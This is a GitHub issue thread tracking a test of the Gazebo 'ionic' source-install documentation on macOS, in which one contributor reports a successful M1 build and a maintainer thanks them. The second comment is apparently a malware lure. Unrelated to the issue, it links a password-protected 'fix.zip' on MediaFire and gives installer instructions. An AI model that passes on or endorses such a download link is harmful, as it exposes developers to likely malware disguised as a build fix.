### ISSUE TITLE
docs: install_osx_src

### ISSUE THREAD

**Issue by azeey-test** [gazebosim/gazebo_test_cases#1700]
## Configuration

* os: MacOS
* buildType: Source

## Links

* [Live](https://gazebosim.org/docs/ionic/install_osx_src)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/install_osx_src.md)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Yadunund** [comment]
I've successfully built `ionic` from source on an `M1 Macbook Pro 14.6.1` 

Image proof below:

<img width="1654" alt="image" src="https://github.com/user-attachments/assets/908a8527-adec-4d96-861b-25f20b99a346">

**Comment by ahcorde** [comment]
Thank you for testing!
